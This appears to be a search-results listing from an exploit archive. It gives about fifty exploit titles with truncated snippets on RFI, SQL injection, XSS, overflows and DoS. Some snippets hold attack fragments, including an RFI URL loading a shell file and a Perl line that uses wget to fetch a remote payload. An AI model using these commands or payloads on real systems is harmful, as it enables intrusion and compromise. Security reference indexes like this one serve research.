41207 matches found
Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow (PoC)
Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow PoC !/usr/local/bin/perl Discovered By UmZ Umair Manzoor comments are welcome at umz32.dllatgmail.com Dated 23-02-2007 Time : 02:00 AM PST Visual Basic Project Company Name Stack Overflow Affected Version : Tested on Visual basic 6...
Beacon 0.2.0 - splash.lang.php Remote File Inclusion
Beacon 0.2.0 - splash.lang.php Remote File Inclusion Beacon = 2.0Remot file inclusion languagePath Download script : http://download.savannah.gnu.org/releases/beacon/beacon020.zip Thanks Str0ke Exploit: http://victime.com/pbeaconpath/beacon/language/1/splash.lang.php?languagePath=shell.txt?...
XOOPS Module Kshop 1.17 - id SQL Injection
XOOPS Module Kshop 1.17 - id SQL Injection !/usr/bin/perl Script Name: XOOPS Module Kshop : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id; $target =...
Microsoft Windows - Animated Cursor .ani Local Stack Overflow
Microsoft Windows - Animated Cursor .ani Local Stack Overflow / Copyright c 2007 devcode ^^ D E V C O D E ^^ Windows .ANI LoadAniIcon Stack Overflow CVE-2007-1765 Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to take complete...
D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service
D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service / ARP FLOODER v0.1 - [email protected] - 2006-12-04 designed to crash D-LINK DWL-2000AP+ compile with: gcc arpflood.c -o arpflood / define BSDSOURCE 1 define GNUSOURCE include include include include include include include include...
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize...
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage...
RedBlog 0.5 - index.php Remote File Inclusion
RedBlog 0.5 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/19658/info RedBLoG is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file containing...
Fantastic News 2.1.3 - script_path Remote File Inclusion
Fantastic News 2.1.3 - scriptpath Remote File Inclusion ============================================================================================== Fantastic News = v2.1.3 CONFIGscriptpath Remote File Inclusion Exploit...
BlueCoat WinProxy 6.0 R1c - GET Denial of Service
BlueCoat WinProxy 6.0 R1c - GET Denial of Service !perl "WinProxy 6.0 R1c" Remote DoS Exploit Author: FistFucker e-Mail: [email protected] Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363 CVE info: CAN-2005-3187 use IO::Socket; destination IP address $ip =...
Noahs Classifieds 1.3 - index.php Cross-Site Scripting
Noahs Classifieds 1.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage thi...
ATutor 1.4.3 - content.php?cid Cross-Site Scripting
ATutor 1.4.3 - content.php?cid Cross-Site Scripting source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of...
Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...
Microsoft Windows - COM Structured Storage Local (MS05-012)
Microsoft Windows - COM Structured Storage Local MS05-012 // by Cesar Cerrudo - Argeniss - www.argeniss.com // MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit // // More exploits at www.argeniss.com/products.html // // Works on Win2k sp4, WinXP sp2, Win2k3 sp0 // Close all...
paNews 2.0b4 - Remote Admin Creation SQL Injection
paNews 2.0b4 - Remote Admin Creation SQL Injection / paNews v2.0b4 silePNEWSxpl This exploit utilize SQL injection for create a new user with admin privileges on paNews software system. References: packetstormsecurity.org/0503-exploits/panews.txt coded by: Silentium of Anacron Group Italy date:...
D-Forum 1.11 - Nav.php3 Cross-Site Scripting
D-Forum 1.11 - Nav.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/12720/info D-Forum is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. As a result of this vulnerability, it is...
NapShare 1.2 - Remote Buffer Overflow (1)
NapShare 1.2 - Remote Buffer Overflow 1 // source: https://www.securityfocus.com/bid/11967/info It is reported that NapShare is susceptible to a remote buffer overflow vulnerability. This is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a...
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote PoC / source: https://www.securityfocus.com/bid/11488/info It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch. A remote attacker may exploit this...
Dropbear SSH 0.34 - Remote Code Execution
Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...
Jordan Windows Telnet Server 1.01.2 - Username Stack Buffer Overrun (1)
Jordan Windows Telnet Server 1.01.2 - Username Stack Buffer Overrun 1 source: https://www.securityfocus.com/bid/9316/info Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive lengt...
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error (4)
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error 4 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
STunnel 3.x - Client Negotiation Protocol Format String
STunnel 3.x - Client Negotiation Protocol Format String // source: https://www.securityfocus.com/bid/3748/info Stunnel is a freely available, open source cryptography wrapper. It is designed to wrap arbitrary protocols that may or may not support cryptography. It is maintained by the Stunnel...
HP-UX 11.0 - SWVerify Buffer Overflow
HP-UX 11.0 - SWVerify Buffer Overflow // source: https://www.securityfocus.com/bid/3279/info HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems. A problem has been discovered in the...
RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service
RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service source: https://www.securityfocus.com/bid/1664/info Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat and others runnng tmpwatch from cron to stop responding, and possibly require a hard reboot...
Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
Easy2Pilot 7 - Cross-Site Request Forgery Add User Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery Add User Author: indoushka Date: 2020-02-20 Tested on: windows 10 Français V.Pro / browser : Mozilla firefox 69.032-bit Vendor: http://easy2pilot-v7.com/ CVE: N/A poc : + Dorking İn Google ...
MyVideoConverter Pro 3.14 - Movie Buffer Overflow
MyVideoConverter Pro 3.14 - Movie Buffer Overflow Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow Exploit Author : ZwX Exploit Date: 2020-02-11 Vendor Homepage : http://www.ivideogo.com/ Tested on OS: Windows 10 v1803 Social: twitter.com/ZwX2a Steps to Reproduce: 1. Run the...
iOSmacOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()
iOSmacOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand, I noticed that the size checks used to parse the IOAccelKernelCommand in...
Ecommerce Systempay 1.0 - Production KEY Brute Force
Ecommerce Systempay 1.0 - Production KEY Brute Force Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force Author: live3 Date: 2020-02-05 Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/ Test...
P2PWIFICAM2 for iOS 10.4.1 - Camera ID Denial of Service (PoC)
P2PWIFICAM2 for iOS 10.4.1 - Camera ID Denial of Service PoC Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service PoC Discovery by: Ivan Marmolejo Discovery Date: 2020-02-02 Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207 Software Link: App Store for iO...
Trend Micro Maximum Security 2019 - Arbitrary Code Execution
Trend Micro Maximum Security 2019 - Arbitrary Code Execution Exploit Title: Trend Micro Maximum Security 2019 - Arbitrary Code Execution Date: 2020-1-16 Exploit Author: hyp3rlinx Vendor Homepage: www.trendmicro.com Version: Platform Microsoft Windows, Premium Security 2019 v15, Maximum Security...
Online Book Store 1.0 - Arbitrary File Upload
Online Book Store 1.0 - Arbitrary File Upload Exploit Title: Online Book Store 1.0 - Arbitrary File Upload Google Dork: N/A Date: 2020-01-16 Exploit Author: Or4nG.M4n aka S4udiExploit Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ Software...
AVE DOMINAplus 1.10.x - Credential Disclosure
AVE DOMINAplus 1.10.x - Credential Disclosure Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web Server Code 53AB-WBS - 1.10.62 Advisory ID:...
Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation Date: 2019-12-18 Exploit Author: Vulnerability-Lab Vendor Homepage:...
Product Key Explorer 4.2.0.0 - Key Denial of Service (PoC)
Product Key Explorer 4.2.0.0 - Key Denial of Service PoC Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service POC Discovery by: SajjadBnd Date: 2019-12-10 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/productkeyexplorersetup.exe Teste...
ipPulse 1.92 - Enter Key Denial of Service (PoC)
ipPulse 1.92 - Enter Key Denial of Service PoC Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service PoC Discovery by: Diego Buztamante Discovery Date: 2019-11-18 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link : http://download.netscantools.com/ipls192.zip Test...
Prima FlexAir Access Control 2.3.38 - Remote Code Execution
Prima FlexAir Access Control 2.3.38 - Remote Code Execution Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution Google Dork: NA Date: 2018-09-06 Exploit Author: LiquidWorm Vendor Homepage: https://www.primasystems.eu/ Software Link:...
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path Date: 2019-11-07 Exploit Author: Héctor Gabriel Chimecatl Hernández Vendor Homepage: https://www.alps.com/e/ Software Link:...
National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation Discovery Date: 2019-10-10 Exploit Author: Ivan Marmolejo Vendor Homepage: http://www.ni.com/en-us.html Software Link:...
TP-Link TL-WR1043ND 2 - Authentication Bypass
TP-Link TL-WR1043ND 2 - Authentication Bypass Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass Date: 2019-06-20 Exploit Author: Uriel Kosayev Vendor Homepage: https://www.tp-link.com Version: TL-WR1043ND V2 Tested on: TL-WR1043ND V2 CVE : CVE-2019-6971 CVE Link:...
Subrion 4.2.1 - Email Persistant Cross-Site Scripting
Subrion 4.2.1 - Email Persistant Cross-Site Scripting Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting Date: 2019-10-07 Author: Min Ko Ko Creatigon Vendor Homepage: https://subrion.org/ CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 Website : https://l33thacker.com Descriptio...
Gila CMS 1.11.1 - Local File Inclusion
Gila CMS 1.11.1 - Local File Inclusion Exploit Title: Authenticated Local File InclusionLFI in GilaCMS Google Dork: N/A Date: 04-08-2019 Exploit Author: Sainadh Jamalpur Vendor Homepage: https://github.com/GilaCMS/gila Software Link: https://github.com/GilaCMS/gila Version: 1.10.9 Tested on: XAMP...
Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts
Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs such as the...
macOS iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded
macOS iOS JavaScriptCore - Loop-Invariant Code Motion LICM Leaves Object Property Access Unguarded While fuzzing JavaScriptCore, I encountered the following modified and commented JavaScript program which crashes jsc from current HEAD and release...
Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation
Microsoft Windows 7 build 7601 x86 - Local Privilege Escalation include include / EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47176.zip / / PREPROCESSOR DEFINITIONS / define MNSELECTITEM 0x1E5 define MNSELECTFIRSTVALIDITEM 0x1E7 define...
Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery
Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery Product : Cisco Wireless Controller Version : 3.6.10E last version Date: 23.07.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Mehmet Önder Key Website: htts://cloudvist.com CVE: CVE-2019-12624 Description : The applicatio...
Microsoft Compiled HTML Help Uncompiled .chm File - XML External Entity Injection
Microsoft Compiled HTML Help Uncompiled .chm File - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt + ISR:...
Zoho ManageEngine ServiceDesk Plus 9.3 - SiteLookup.do Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus 9.3 - SiteLookup.do Cross-Site Scripting Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage:...
Solaris 789 (SPARC) - dtprintinfo Local Privilege Escalation (2)
Solaris 789 SPARC - dtprintinfo Local Privilege Escalation 2 / raptordtprintnamesparc2.c - dtprintinfo 0day, Solaris/SPARC Copyright c 2004-2019 Marco Ivaldi 0day buffer overflow in the dtprintinfo1 CDE Print Viewer, leading to local root. Many thanks to Dave Aitel for discovering this...
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
LG Supersign EZ CMS - Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LG Supersign EZ CMS RCE', 'Description' = %q LG SuperSignEZ CMS, that many LG SuperSign TVs...
Pegasus CMS 1.0 - extra_fields.php Plugin Remote Code Execution
Pegasus CMS 1.0 - extrafields.php Plugin Remote Code Execution Exploit Title: Pegasus extrafields.php Plugin Remote Code Execution Date: 14 March 2019 Exploit Author: R3zk0n Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms Software Link: N/A Version: 1.0 Tested on: Linux CVE : N/A The...